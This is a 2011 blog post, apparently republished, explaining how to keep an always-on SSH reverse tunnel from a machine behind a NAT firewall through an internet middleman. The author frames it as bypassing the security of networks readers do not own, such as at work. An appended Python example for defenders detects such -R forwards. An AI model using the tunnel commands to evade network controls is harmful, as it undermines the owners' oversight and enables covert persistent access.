Nytro

Bypassing NAT with client to client SSH connections


Posted: December 19, 2011 in Guides

Okay, well I know it’s been entirely too long since I’ve written anything here, and for those of you who know me personally you know I’ve had a very hectic schedule of late. Sorry for the delay in posting, also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I’m hoping to have at least one of them up after the holidays, but no promises.

So to tide you over for a little bit, and to get a new post up here, I’m going to discuss something that a lot of people ask about on Ubuntu Forums. It is against Ubuntu Forums policy to instruct people how to bypass the security of a network they do not own. This, however, is my personal blog and I will instruct whatever I want. That being said, if you do this at work and get fired it’s your fault; most sysadmins will frown on this, and yes, they will catch you.

This is not really a new trick, but it will bypass NAT and allow you to have an always on SSH connection to an endpoint behind a NAT router (with no ports forwarded).

This requires three systems: the endpoint (which is behind the firewall); the middleman, which is a machine you control somewhere on the internet; and the machine you want to SSH from (presumably your home machine or another system that you control).

Note: For the purposes of this guide the following IPs are used as a point of reference.

Middleman : 192.168.0.15

Endpoint Behind Firewall : 172.16.128.4

Machine that you’re SSH’ing from : 192.168.0.14

So here we go.

Setting up the Middle Man

First things first, we need to install openssh-server on our middleman and configure it as a gateway.

Note : This is done on Ubuntu, change commands appropriately for your operating environment.

sudo apt-get install openssh-server

Now we want to edit /etc/ssh/sshd_config and add the following lines.

GatewayPorts yes
TCPKeepAlive yes

This will keep our connections alive and allow us to tunnel through this system.

Creating a Reverse Connection From the Endpoint

Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I’m lazy so I didn’t generate keys here.

ssh -R 31337:localhost:22 dangertux@192.168.0.15

What this does is create a reverse connection and tunnel to 192.168.0.15: port 31337 on the middleman is forwarded back to port 22 (SSH) on the endpoint.

Connect From Your Machine

Now we connect to the middleman server from our machine.

ssh -p 31337 dangertux@192.168.0.15

Note: the password you are prompted for will be the password of the user on the machine behind the firewall.

There you go, an always on SSH client – client connection that bypasses NAT routing. Again, a friendly warning: a sysop will not take “DT told me to” as an excuse; besides, I didn’t tell you to, I told you how.

Source: SSH Hacks: Bypassing NAT with client to client SSH connections
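
For defenders who need to spot this kind of tunnel, the following added example (not part of the original post or written by its author) parses ssh command lines for -R forwards and reports where sshd binds the forwarded port for each GatewayPorts value described in sshd_config(5). The function names and the sample command lines are constructed for illustration; IPv6 bracketed addresses are not handled.

```python
import shlex

ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")  # ssh(1) options that take an argument

def parse_spec(spec):
    """Split [bind_address:]port:host:hostport (IPv6 bracket forms not handled)."""
    parts = spec.split(":")
    if len(parts) in (3, 4) and parts[-3].isdigit() and parts[-1].isdigit():
        bind = parts[0] if len(parts) == 4 else None
        return (bind, int(parts[-3]), parts[-2], int(parts[-1]))
    return None

def remote_forwards(cmdline):
    """Return every -R forward requested by one ssh command line."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    found, i, seen_dest = [], 1, False
    while i < len(argv):
        arg, i = argv[i], i + 1
        if not arg.startswith("-"):
            if seen_dest:
                break                  # second bare word starts the remote command
            seen_dest = True           # first bare word is the destination
            continue
        for pos, flag in enumerate(arg[1:], start=1):
            if flag not in ARG_OPTS:
                continue               # argument-less flag: keep walking e.g. -fNR
            value = arg[pos + 1:]      # "-Rspec" form, else take the next word
            if not value and i < len(argv):
                value, i = argv[i], i + 1
            if flag == "R" and parse_spec(value):
                found.append(parse_spec(value))
            break
    return found

def listener_scope(bind, gateway_ports):
    """Where sshd binds the forwarded port for a given GatewayPorts value."""
    if gateway_ports == "yes":
        return "all interfaces"        # the setting used on the middleman above
    if gateway_ports == "clientspecified" and bind is not None:
        return "all interfaces" if bind in ("", "*") else bind
    return "loopback only"             # sshd default ("no")

# Constructed command lines, as seen in a process listing on the endpoint (not real data).
SAMPLE_CMDS = [
    "ssh -R 31337:localhost:22 dangertux@192.168.0.15",
    "/usr/bin/ssh -fNR *:8022:localhost:22 dangertux@192.168.0.15",
]
print([(f, listener_scope(f[0], "yes")) for c in SAMPLE_CMDS for f in remote_forwards(c)])
```

With GatewayPorts no on the middleman the same forward is reachable only from the middleman itself, so the connection from 192.168.0.14 in the last step would be refused.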
